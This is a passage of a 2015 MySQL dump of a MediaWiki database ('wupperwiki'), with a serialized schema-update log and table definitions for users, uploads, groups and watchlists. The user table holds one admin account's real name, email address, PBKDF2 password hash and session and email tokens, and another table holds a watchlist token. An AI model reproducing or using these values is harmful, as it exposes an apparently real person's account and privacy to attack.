:\"addField\";i:1;s:4:\"user\";i:2;s:17:\"user_registration\";i:3;s:27:\"patch-user_registration.sql\";}i:50;a:1:{i:0;s:21:\"doTemplatelinksUpdate\";}i:51;a:3:{i:0;s:8:\"addTable\";i:1;s:13:\"externallinks\";i:2;s:23:\"patch-externallinks.sql\";}i:52;a:3:{i:0;s:8:\"addTable\";i:1;s:3:\"job\";i:2;s:13:\"patch-job.sql\";}i:53;a:4:{i:0;s:8:\"addField\";i:1;s:10:\"site_stats\";i:2;s:9:\"ss_images\";i:3;s:19:\"patch-ss_images.sql\";}i:54;a:3:{i:0;s:8:\"addTable\";i:1;s:9:\"langlinks\";i:2;s:19:\"patch-langlinks.sql\";}i:55;a:3:{i:0;s:8:\"addTable\";i:1;s:15:\"querycache_info\";i:2;s:24:\"patch-querycacheinfo.sql\";}i:56;a:3:{i:0;s:8:\"addTable\";i:1;s:11:\"filearchive\";i:2;s:21:\"patch-filearchive.sql\";}i:57;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"ipblocks\";i:2;s:13:\"ipb_anon_only\";i:3;s:23:\"patch-ipb_anon_only.sql\";}i:58;a:4:{i:0;s:8:\"addIndex\";i:1;s:13:\"recentchanges\";i:2;s:14:\"rc_ns_usertext\";i:3;s:31:\"patch-recentchanges-utindex.sql\";}i:59;a:4:{i:0;s:8:\"addIndex\";i:1;s:13:\"recentchanges\";i:2;s:12:\"rc_user_text\";i:3;s:28:\"patch-rc_user_text-index.sql\";}i:60;a:4:{i:0;s:8:\"addField\";i:1;s:4:\"user\";i:2;s:17:\"user_newpass_time\";i:3;s:27:\"patch-user_newpass_time.sql\";}i:61;a:3:{i:0;s:8:\"addTable\";i:1;s:8:\"redirect\";i:2;s:18:\"patch-redirect.sql\";}i:62;a:3:{i:0;s:8:\"addTable\";i:1;s:13:\"querycachetwo\";i:2;s:23:\"patch-querycachetwo.sql\";}i:63;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"ipblocks\";i:2;s:20:\"ipb_enable_autoblock\";i:3;s:32:\"patch-ipb_optional_autoblock.sql\";}i:64;a:1:{i:0;s:26:\"doBacklinkingIndicesUpdate\";}i:65;a:4:{i:0;s:8:\"addField\";i:1;s:13:\"recentchanges\";i:2;s:10:\"rc_old_len\";i:3;s:16:\"patch-rc_len.sql\";}i:66;a:4:{i:0;s:8:\"addField\";i:1;s:4:\"user\";i:2;s:14:\"user_editcount\";i:3;s:24:\"patch-user_editcount.sql\";}i:67;a:1:{i:0;s:20:\"doRestrictionsUpdate\";}i:68;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"logging\";i:2;s:6:\"log_id\";i:3;s:16:\"patch-log_id.sql\";}i:69;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"revision\";i:2;s:13:\"rev_parent_id\";i:3;s:23:\"patch-rev_parent_id.sql\";}i:70;a:4:{i:0;s:8:\"addField\";i:1;s:17:\"page_restrictions\";i:2;s:5:\"pr_id\";i:3;s:35:\"patch-page_restrictions_sortkey.sql\";}i:71;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"revision\";i:2;s:7:\"rev_len\";i:3;s:17:\"patch-rev_len.sql\";}i:72;a:4:{i:0;s:8:\"addField\";i:1;s:13:\"recentchanges\";i:2;s:10:\"rc_deleted\";i:3;s:20:\"patch-rc_deleted.sql\";}i:73;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"logging\";i:2;s:11:\"log_deleted\";i:3;s:21:\"patch-log_deleted.sql\";}i:74;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"archive\";i:2;s:10:\"ar_deleted\";i:3;s:20:\"patch-ar_deleted.sql\";}i:75;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"ipblocks\";i:2;s:11:\"ipb_deleted\";i:3;s:21:\"patch-ipb_deleted.sql\";}i:76;a:4:{i:0;s:8:\"addField\";i:1;s:11:\"filearchive\";i:2;s:10:\"fa_deleted\";i:3;s:20:\"patch-fa_deleted.sql\";}i:77;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"archive\";i:2;s:6:\"ar_len\";i:3;s:16:\"patch-ar_len.sql\";}i:78;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"ipblocks\";i:2;s:15:\"ipb_block_email\";i:3;s:22:\"patch-ipb_emailban.sql\";}i:79;a:1:{i:0;s:28:\"doCategorylinksIndicesUpdate\";}i:80;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"oldimage\";i:2;s:11:\"oi_metadata\";i:3;s:21:\"patch-oi_metadata.sql\";}i:81;a:4:{i:0;s:8:\"addIndex\";i:1;s:7:\"archive\";i:2;s:18:\"usertext_timestamp\";i:3;s:28:\"patch-archive-user-index.sql\";}i:82;a:4:{i:0;s:8:\"addIndex\";i:1;s:5:\"image\";i:2;s:22:\"img_usertext_timestamp\";i:3;s:26:\"patch-image-user-index.sql\";}i:83;a:4:{i:0;s:8:\"addIndex\";i:1;s:8:\"oldimage\";i:2;s:21:\"oi_usertext_timestamp\";i:3;s:29:\"patch-oldimage-user-index.sql\";}i:84;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"archive\";i:2;s:10:\"ar_page_id\";i:3;s:25:\"patch-archive-page_id.sql\";}i:85;a:4:{i:0;s:8:\"addField\";i:1;s:5:\"image\";i:2;s:8:\"img_sha1\";i:3;s:18:\"patch-img_sha1.sql\";}i:86;a:3:{i:0;s:8:\"addTable\";i:1;s:16:\"protected_titles\";i:2;s:26:\"patch-protected_titles.sql\";}i:87;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"ipblocks\";i:2;s:11:\"ipb_by_text\";i:3;s:21:\"patch-ipb_by_text.sql\";}i:88;a:3:{i:0;s:8:\"addTable\";i:1;s:10:\"page_props\";i:2;s:20:\"patch-page_props.sql\";}i:89;a:3:{i:0;s:8:\"addTable\";i:1;s:9:\"updatelog\";i:2;s:19:\"patch-updatelog.sql\";}i:90;a:3:{i:0;s:8:\"addTable\";i:1;s:8:\"category\";i:2;s:18:\"patch-category.sql\";}i:91;a:1:{i:0;s:20:\"doCategoryPopulation\";}i:92;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"archive\";i:2;s:12:\"ar_parent_id\";i:3;s:22:\"patch-ar_parent_id.sql\";}i:93;a:4:{i:0;s:8:\"addField\";i:1;s:12:\"user_newtalk\";i:2;s:19:\"user_last_timestamp\";i:3;s:29:\"patch-user_last_timestamp.sql\";}i:94;a:1:{i:0;s:18:\"doPopulateParentId\";}i:95;a:4:{i:0;s:8:\"checkBin\";i:1;s:16:\"protected_titles\";i:2;s:8:\"pt_title\";i:3;s:27:\"patch-pt_title-encoding.sql\";}i:96;a:1:{i:0;s:28:\"doMaybeProfilingMemoryUpdate\";}i:97;a:1:{i:0;s:26:\"doFilearchiveIndicesUpdate\";}i:98;a:4:{i:0;s:8:\"addField\";i:1;s:10:\"site_stats\";i:2;s:15:\"ss_active_users\";i:3;s:25:\"patch-ss_active_users.sql\";}i:99;a:1:{i:0;s:17:\"doActiveUsersInit\";}i:100;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"ipblocks\";i:2;s:18:\"ipb_allow_usertalk\";i:3;s:28:\"patch-ipb_allow_usertalk.sql\";}i:101;a:1:{i:0;s:14:\"doUniquePlTlIl\";}i:102;a:3:{i:0;s:8:\"addTable\";i:1;s:10:\"change_tag\";i:2;s:20:\"patch-change_tag.sql\";}i:103;a:3:{i:0;s:8:\"addTable\";i:1;s:11:\"tag_summary\";i:2;s:21:\"patch-tag_summary.sql\";}i:104;a:3:{i:0;s:8:\"addTable\";i:1;s:9:\"valid_tag\";i:2;s:19:\"patch-valid_tag.sql\";}i:105;a:3:{i:0;s:8:\"addTable\";i:1;s:15:\"user_properties\";i:2;s:25:\"patch-user_properties.sql\";}i:106;a:3:{i:0;s:8:\"addTable\";i:1;s:10:\"log_search\";i:2;s:20:\"patch-log_search.sql\";}i:107;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"logging\";i:2;s:13:\"log_user_text\";i:3;s:23:\"patch-log_user_text.sql\";}i:108;a:1:{i:0;s:23:\"doLogUsertextPopulation\";}i:109;a:1:{i:0;s:21:\"doLogSearchPopulation\";}i:110;a:3:{i:0;s:8:\"addTable\";i:1;s:10:\"l10n_cache\";i:2;s:20:\"patch-l10n_cache.sql\";}i:111;a:4:{i:0;s:8:\"addIndex\";i:1;s:10:\"log_search\";i:2;s:12:\"ls_field_val\";i:3;s:33:\"patch-log_search-rename-index.sql\";}i:112;a:4:{i:0;s:8:\"addIndex\";i:1;s:10:\"change_tag\";i:2;s:17:\"change_tag_rc_tag\";i:3;s:28:\"patch-change_tag-indexes.sql\";}i:113;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"redirect\";i:2;s:12:\"rd_interwiki\";i:3;s:22:\"patch-rd_interwiki.sql\";}i:114;a:1:{i:0;s:23:\"doUpdateTranscacheField\";}i:115;a:1:{i:0;s:22:\"doUpdateMimeMinorField\";}i:116;a:3:{i:0;s:8:\"addTable\";i:1;s:7:\"iwlinks\";i:2;s:17:\"patch-iwlinks.sql\";}i:117;a:4:{i:0;s:8:\"addIndex\";i:1;s:7:\"iwlinks\";i:2;s:21:\"iwl_prefix_title_from\";i:3;s:27:\"patch-rename-iwl_prefix.sql\";}i:118;a:4:{i:0;s:8:\"addField\";i:1;s:9:\"updatelog\";i:2;s:8:\"ul_value\";i:3;s:18:\"patch-ul_value.sql\";}i:119;a:4:{i:0;s:8:\"addField\";i:1;s:9:\"interwiki\";i:2;s:6:\"iw_api\";i:3;s:27:\"patch-iw_api_and_wikiid.sql\";}i:120;a:4:{i:0;s:9:\"dropIndex\";i:1;s:7:\"iwlinks\";i:2;s:10:\"iwl_prefix\";i:3;s:25:\"patch-kill-iwl_prefix.sql\";}i:121;a:4:{i:0;s:8:\"addField\";i:1;s:13:\"categorylinks\";i:2;s:12:\"cl_collation\";i:3;s:40:\"patch-categorylinks-better-collation.sql\";}i:122;a:1:{i:0;s:16:\"doClFieldsUpdate\";}i:123;a:1:{i:0;s:17:\"doCollationUpdate\";}i:124;a:3:{i:0;s:8:\"addTable\";i:1;s:12:\"msg_resource\";i:2;s:22:\"patch-msg_resource.sql\";}i:125;a:3:{i:0;s:8:\"addTable\";i:1;s:11:\"module_deps\";i:2;s:21:\"patch-module_deps.sql\";}i:126;a:4:{i:0;s:9:\"dropIndex\";i:1;s:7:\"archive\";i:2;s:13:\"ar_page_revid\";i:3;s:36:\"patch-archive_kill_ar_page_revid.sql\";}i:127;a:4:{i:0;s:8:\"addIndex\";i:1;s:7:\"archive\";i:2;s:8:\"ar_revid\";i:3;s:26:\"patch-archive_ar_revid.sql\";}i:128;a:1:{i:0;s:23:\"doLangLinksLengthUpdate\";}i:129;a:1:{i:0;s:29:\"doUserNewTalkTimestampNotNull\";}i:130;a:4:{i:0;s:8:\"addIndex\";i:1;s:4:\"user\";i:2;s:10:\"user_email\";i:3;s:26:\"patch-user_email_index.sql\";}i:131;a:4:{i:0;s:11:\"modifyField\";i:1;s:15:\"user_properties\";i:2;s:11:\"up_property\";i:3;s:21:\"patch-up_property.sql\";}i:132;a:3:{i:0;s:8:\"addTable\";i:1;s:11:\"uploadstash\";i:2;s:21:\"patch-uploadstash.sql\";}i:133;a:3:{i:0;s:8:\"addTable\";i:1;s:18:\"user_former_groups\";i:2;s:28:\"patch-user_former_groups.sql\";}i:134;a:4:{i:0;s:8:\"addIndex\";i:1;s:7:\"logging\";i:2;s:11:\"type_action\";i:3;s:35:\"patch-logging-type-action-index.sql\";}i:135;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"revision\";i:2;s:8:\"rev_sha1\";i:3;s:18:\"patch-rev_sha1.sql\";}i:136;a:1:{i:0;s:20:\"doMigrateUserOptions\";}i:137;a:4:{i:0;s:9:\"dropField\";i:1;s:4:\"user\";i:2;s:12:\"user_options\";i:3;s:27:\"patch-drop-user_options.sql\";}i:138;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"archive\";i:2;s:7:\"ar_sha1\";i:3;s:17:\"patch-ar_sha1.sql\";}i:139;a:4:{i:0;s:8:\"addIndex\";i:1;s:4:\"page\";i:2;s:27:\"page_redirect_namespace_len\";i:3;s:37:\"patch-page_redirect_namespace_len.sql\";}i:140;a:4:{i:0;s:8:\"addField\";i:1;s:11:\"uploadstash\";i:2;s:12:\"us_chunk_inx\";i:3;s:27:\"patch-uploadstash_chunk.sql\";}i:141;a:4:{i:0;s:8:\"addfield\";i:1;s:3:\"job\";i:2;s:13:\"job_timestamp\";i:3;s:28:\"patch-jobs-add-timestamp.sql\";}i:142;a:4:{i:0;s:8:\"addIndex\";i:1;s:8:\"revision\";i:2;s:19:\"page_user_timestamp\";i:3;s:34:\"patch-revision-user-page-index.sql\";}i:143;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"ipblocks\";i:2;s:19:\"ipb_parent_block_id\";i:3;s:29:\"patch-ipb-parent-block-id.sql\";}i:144;a:4:{i:0;s:8:\"addIndex\";i:1;s:8:\"ipblocks\";i:2;s:19:\"ipb_parent_block_id\";i:3;s:35:\"patch-ipb-parent-block-id-index.sql\";}i:145;a:4:{i:0;s:9:\"dropField\";i:1;s:8:\"category\";i:2;s:10:\"cat_hidden\";i:3;s:20:\"patch-cat_hidden.sql\";}i:146;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"revision\";i:2;s:18:\"rev_content_format\";i:3;s:37:\"patch-revision-rev_content_format.sql\";}i:147;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"revision\";i:2;s:17:\"rev_content_model\";i:3;s:36:\"patch-revision-rev_content_model.sql\";}i:148;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"archive\";i:2;s:17:\"ar_content_format\";i:3;s:35:\"patch-archive-ar_content_format.sql\";}i:149;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"archive\";i:2;s:16:\"ar_content_model\";i:3;s:34:\"patch-archive-ar_content_model.sql\";}i:150;a:4:{i:0;s:8:\"addField\";i:1;s:4:\"page\";i:2;s:18:\"page_content_model\";i:3;s:33:\"patch-page-page_content_model.sql\";}i:151;a:1:{i:0;s:25:\"enableContentHandlerUseDB\";}i:152;a:4:{i:0;s:9:\"dropField\";i:1;s:10:\"site_stats\";i:2;s:9:\"ss_admins\";i:3;s:24:\"patch-drop-ss_admins.sql\";}i:153;a:4:{i:0;s:9:\"dropField\";i:1;s:13:\"recentchanges\";i:2;s:17:\"rc_moved_to_title\";i:3;s:18:\"patch-rc_moved.sql\";}i:154;a:3:{i:0;s:8:\"addTable\";i:1;s:5:\"sites\";i:2;s:15:\"patch-sites.sql\";}i:155;a:4:{i:0;s:8:\"addField\";i:1;s:11:\"filearchive\";i:2;s:7:\"fa_sha1\";i:3;s:17:\"patch-fa_sha1.sql\";}i:156;a:4:{i:0;s:8:\"addField\";i:1;s:3:\"job\";i:2;s:9:\"job_token\";i:3;s:19:\"patch-job_token.sql\";}i:157;a:4:{i:0;s:8:\"addField\";i:1;s:3:\"job\";i:2;s:12:\"job_attempts\";i:3;s:22:\"patch-job_attempts.sql\";}i:158;a:1:{i:0;s:17:\"doEnableProfiling\";}i:159;a:4:{i:0;s:8:\"addField\";i:1;s:11:\"uploadstash\";i:2;s:8:\"us_props\";i:3;s:30:\"patch-uploadstash-us_props.sql\";}i:160;a:4:{i:0;s:11:\"modifyField\";i:1;s:11:\"user_groups\";i:2;s:8:\"ug_group\";i:3;s:38:\"patch-ug_group-length-increase-255.sql\";}i:161;a:4:{i:0;s:11:\"modifyField\";i:1;s:18:\"user_former_groups\";i:2;s:9:\"ufg_group\";i:3;s:39:\"patch-ufg_group-length-increase-255.sql\";}i:162;a:4:{i:0;s:8:\"addIndex\";i:1;s:10:\"page_props\";i:2;s:16:\"pp_propname_page\";i:3;s:40:\"patch-page_props-propname-page-index.sql\";}i:163;a:4:{i:0;s:8:\"addIndex\";i:1;s:5:\"image\";i:2;s:14:\"img_media_mime\";i:3;s:30:\"patch-img_media_mime-index.sql\";}i:164;a:1:{i:0;s:23:\"doIwlinksIndexNonUnique\";}i:165;a:4:{i:0;s:8:\"addIndex\";i:1;s:7:\"iwlinks\";i:2;s:21:\"iwl_prefix_from_title\";i:3;s:34:\"patch-iwlinks-from-title-index.sql\";}i:166;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"archive\";i:2;s:5:\"ar_id\";i:3;s:23:\"patch-archive-ar_id.sql\";}i:167;a:4:{i:0;s:8:\"addField\";i:1;s:13:\"externallinks\";i:2;s:5:\"el_id\";i:3;s:29:\"patch-externallinks-el_id.sql\";}i:168;a:4:{i:0;s:8:\"addField\";i:1;s:13:\"recentchanges\";i:2;s:9:\"rc_source\";i:3;s:19:\"patch-rc_source.sql\";}i:169;a:4:{i:0;s:8:\"addIndex\";i:1;s:7:\"logging\";i:2;s:23:\"log_user_text_type_time\";i:3;s:43:\"patch-logging_user_text_type_time_index.sql\";}i:170;a:4:{i:0;s:8:\"addIndex\";i:1;s:7:\"logging\";i:2;s:18:\"log_user_text_time\";i:3;s:38:\"patch-logging_user_text_time_index.sql\";}i:171;a:4:{i:0;s:8:\"addField\";i:1;s:4:\"page\";i:2;s:18:\"page_links_updated\";i:3;s:28:\"patch-page_links_updated.sql\";}i:172;a:4:{i:0;s:8:\"addField\";i:1;s:4:\"user\";i:2;s:21:\"user_password_expires\";i:3;s:30:\"patch-user_password_expire.sql\";}i:173;a:4:{i:0;s:8:\"addField\";i:1;s:10:\"page_props\";i:2;s:10:\"pp_sortkey\";i:3;s:20:\"patch-pp_sortkey.sql\";}i:174;a:4:{i:0;s:9:\"dropField\";i:1;s:13:\"recentchanges\";i:2;s:11:\"rc_cur_time\";i:3;s:26:\"patch-drop-rc_cur_time.sql\";}i:175;a:4:{i:0;s:8:\"addIndex\";i:1;s:9:\"watchlist\";i:2;s:29:\"wl_user_notificationtimestamp\";i:3;s:52:\"patch-watchlist-user-notificationtimestamp-index.sql\";}i:176;a:4:{i:0;s:8:\"addField\";i:1;s:4:\"page\";i:2;s:9:\"page_lang\";i:3;s:19:\"patch-page_lang.sql\";}i:177;a:4:{i:0;s:8:\"addField\";i:1;s:9:\"pagelinks\";i:2;s:17:\"pl_from_namespace\";i:3;s:27:\"patch-pl_from_namespace.sql\";}i:178;a:4:{i:0;s:8:\"addField\";i:1;s:13:\"templatelinks\";i:2;s:17:\"tl_from_namespace\";i:3;s:27:\"patch-tl_from_namespace.sql\";}i:179;a:4:{i:0;s:8:\"addField\";i:1;s:10:\"imagelinks\";i:2;s:17:\"il_from_namespace\";i:3;s:27:\"patch-il_from_namespace.sql\";}i:180;a:4:{i:0;s:11:\"modifyField\";i:1;s:5:\"image\";i:2;s:14:\"img_major_mime\";i:3;s:33:\"patch-img_major_mime-chemical.sql\";}i:181;a:4:{i:0;s:11:\"modifyField\";i:1;s:8:\"oldimage\";i:2;s:13:\"oi_major_mime\";i:3;s:32:\"patch-oi_major_mime-chemical.sql\";}i:182;a:4:{i:0;s:11:\"modifyField\";i:1;s:11:\"filearchive\";i:2;s:13:\"fa_major_mime\";i:3;s:32:\"patch-fa_major_mime-chemical.sql\";}}'),('user_former_groups-ufg_group-patch-ufg_group-length-increase-255.sql',NULL),('user_groups-ug_group-patch-ug_group-length-increase-255.sql',NULL),('user_properties-up_property-patch-up_property.sql',NULL); /*!40000 ALTER TABLE `updatelog` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `uploadstash` -- DROP TABLE IF EXISTS `uploadstash`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `uploadstash` ( `us_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `us_user` int(10) unsigned NOT NULL, `us_key` varbinary(255) NOT NULL, `us_orig_path` varbinary(255) NOT NULL, `us_path` varbinary(255) NOT NULL, `us_source_type` varbinary(50) DEFAULT NULL, `us_timestamp` varbinary(14) NOT NULL, `us_status` varbinary(50) NOT NULL, `us_chunk_inx` int(10) unsigned DEFAULT NULL, `us_props` blob, `us_size` int(10) unsigned NOT NULL, `us_sha1` varbinary(31) NOT NULL, `us_mime` varbinary(255) DEFAULT NULL, `us_media_type` enum('UNKNOWN','BITMAP','DRAWING','AUDIO','VIDEO','MULTIMEDIA','OFFICE','TEXT','EXECUTABLE','ARCHIVE') DEFAULT NULL, `us_image_width` int(10) unsigned DEFAULT NULL, `us_image_height` int(10) unsigned DEFAULT NULL, `us_image_bits` smallint(5) unsigned DEFAULT NULL, PRIMARY KEY (`us_id`), UNIQUE KEY `us_key` (`us_key`), KEY `us_user` (`us_user`), KEY `us_timestamp` (`us_timestamp`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `uploadstash` -- LOCK TABLES `uploadstash` WRITE; /*!40000 ALTER TABLE `uploadstash` DISABLE KEYS */; /*!40000 ALTER TABLE `uploadstash` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `user` -- DROP TABLE IF EXISTS `user`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `user` ( `user_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `user_name` varbinary(255) NOT NULL DEFAULT '', `user_real_name` varbinary(255) NOT NULL DEFAULT '', `user_password` tinyblob NOT NULL, `user_newpassword` tinyblob NOT NULL, `user_newpass_time` binary(14) DEFAULT NULL, `user_email` tinyblob NOT NULL, `user_touched` binary(14) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `user_token` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `user_email_authenticated` binary(14) DEFAULT NULL, `user_email_token` binary(32) DEFAULT NULL, `user_email_token_expires` binary(14) DEFAULT NULL, `user_registration` binary(14) DEFAULT NULL, `user_editcount` int(11) DEFAULT NULL, `user_password_expires` varbinary(14) DEFAULT NULL, PRIMARY KEY (`user_id`), UNIQUE KEY `user_name` (`user_name`), KEY `user_email_token` (`user_email_token`), KEY `user_email` (`user_email`(50)) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `user` -- LOCK TABLES `user` WRITE; /*!40000 ALTER TABLE `user` DISABLE KEYS */; INSERT INTO `user` VALUES (1,'Wikiadmin','Olli Graf',':pbkdf2:sha256:10000:128:+9qZikKhGwEp1fGohnejvg==:34Y3ACA3w1k0PXrn13nnloYZU3X68Pw+Es1W+FCG5WsnTGQCa1Bwd9mPw4HrrJ3R0xOQktUy7h45kafp2v+mjj+7fraULpzb1GRWRHTvQTKh6nEwVTfPRPMOeKvuT5awNIfUSd1LdWscDDXccaVkppPI72ey1qDuVv07r6x5H4I=','',NULL,'olli@ollital.de','20150430142951','c58b45914319d0b910b63639f65d4220','20150429050953','849007754e776ed905f21fb6134155aa','20150506050842','20150428205701',13,NULL); /*!40000 ALTER TABLE `user` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `user_former_groups` -- DROP TABLE IF EXISTS `user_former_groups`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `user_former_groups` ( `ufg_user` int(10) unsigned NOT NULL DEFAULT '0', `ufg_group` varbinary(255) NOT NULL DEFAULT '', UNIQUE KEY `ufg_user_group` (`ufg_user`,`ufg_group`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `user_former_groups` -- LOCK TABLES `user_former_groups` WRITE; /*!40000 ALTER TABLE `user_former_groups` DISABLE KEYS */; /*!40000 ALTER TABLE `user_former_groups` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `user_groups` -- DROP TABLE IF EXISTS `user_groups`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `user_groups` ( `ug_user` int(10) unsigned NOT NULL DEFAULT '0', `ug_group` varbinary(255) NOT NULL DEFAULT '', UNIQUE KEY `ug_user_group` (`ug_user`,`ug_group`), KEY `ug_group` (`ug_group`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `user_groups` -- LOCK TABLES `user_groups` WRITE; /*!40000 ALTER TABLE `user_groups` DISABLE KEYS */; /*!40000 ALTER TABLE `user_groups` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `user_newtalk` -- DROP TABLE IF EXISTS `user_newtalk`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `user_newtalk` ( `user_id` int(11) NOT NULL DEFAULT '0', `user_ip` varbinary(40) NOT NULL DEFAULT '', `user_last_timestamp` varbinary(14) DEFAULT NULL, KEY `user_id` (`user_id`), KEY `user_ip` (`user_ip`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `user_newtalk` -- LOCK TABLES `user_newtalk` WRITE; /*!40000 ALTER TABLE `user_newtalk` DISABLE KEYS */; /*!40000 ALTER TABLE `user_newtalk` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `user_properties` -- DROP TABLE IF EXISTS `user_properties`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `user_properties` ( `up_user` int(11) NOT NULL, `up_property` varbinary(255) DEFAULT NULL, `up_value` blob, UNIQUE KEY `user_properties_user_property` (`up_user`,`up_property`), KEY `user_properties_property` (`up_property`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `user_properties` -- LOCK TABLES `user_properties` WRITE; /*!40000 ALTER TABLE `user_properties` DISABLE KEYS */; INSERT INTO `user_properties` VALUES (1,'watchlisttoken','521ed8b2627e4e8f47b743c2a1a112053228beb5'),(1,'timecorrection','Offset|0'); /*!40000 ALTER TABLE `user_properties` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `valid_tag` -- DROP TABLE IF EXISTS `valid_tag`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `valid_tag` ( `vt_tag` varbinary(255) NOT NULL, PRIMARY KEY (`vt_tag`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `valid_tag` -- LOCK TABLES `valid_tag` WRITE; /*!40000 ALTER TABLE `valid_tag` DISABLE KEYS */; /*!40000 ALTER TABLE `valid_tag` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `watchlist` -- DROP TABLE IF EXISTS `watchlist`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `watchlist` ( `wl_user` int(10) unsigned NOT NULL, `wl_namespace` int(11) NOT NULL DEFAULT '0', `wl_title` varbinary(255) NOT NULL DEFAULT '', `wl_notificationtimestamp` varbinary(14) DEFAULT NULL, UNIQUE KEY `wl_user` (`wl_user`,`wl_namespace`,`wl_title`), KEY `namespace_title` (`wl_namespace`,`wl_title`), KEY `wl_user_notificationtimestamp` (`wl_user`,`wl_notificationtimestamp`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `watchlist` -- LOCK TABLES `watchlist` WRITE; /*!40000 ALTER TABLE `watchlist` DISABLE KEYS */; INSERT INTO `watchlist` VALUES (1,0,'Hauptseite',NULL),(1,0,'WupperWiki:Starthilfe',NULL),(1,1,'Hauptseite',NULL),(1,1,'WupperWiki:Starthilfe',NULL),(1,2,'Wikiadmin',NULL),(1,3,'Wikiadmin',NULL),(1,4,'Über_WuppertalWiki',NULL),(1,5,'Über_WuppertalWiki',NULL),(1,10,'FormatZahl',NULL),(1,10,'FormatZahlLokal',NULL),(1,11,'FormatZahl',NULL),(1,11,'FormatZahlLokal',NULL); /*!40000 ALTER TABLE `watchlist` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping events for database 'wupperwiki' -- /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2015-12-29 11:45:56